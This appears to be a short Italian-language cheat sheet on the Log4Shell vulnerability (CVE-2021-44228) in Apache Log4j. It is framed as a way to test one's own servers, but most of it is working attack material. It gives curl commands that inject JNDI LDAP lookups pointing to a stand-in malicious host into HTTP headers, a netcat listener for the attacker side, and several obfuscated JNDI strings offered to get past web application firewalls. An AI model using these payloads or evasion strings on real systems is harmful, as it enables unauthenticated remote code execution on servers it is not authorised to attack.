
CVE-2021-44228
Il 5 dicembre 2021, Apache ha identificato una vulnerabilità (successivamente identificata come CVE-2021-44228) nel suo ampiamente utilizzato servizio di logging Log4j. La vulnerabilità, nota anche come Log4shell, consente agli attaccanti di ottenere il controllo completo dei server interessati permettendo l'esecuzione remota di codice non autenticata se l'utente esegue un'applicazione che utilizza la libreria di logging Java. Log4j è fortemente integrato in un'ampia gamma di framework DevOps, sistemi IT aziendali e software e prodotti cloud dei fornitori.
Eseguire quanto segue sull'host remoto malevolo per verificare se il proprio server è vulnerabile allo sfruttamento di Log4j
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
Altre varianti che coinvolgono una richiesta HTTP-POST possono essere utilizzate per verificare la vulnerabilità
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
Per bypassare il firewall dell'applicazione web
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}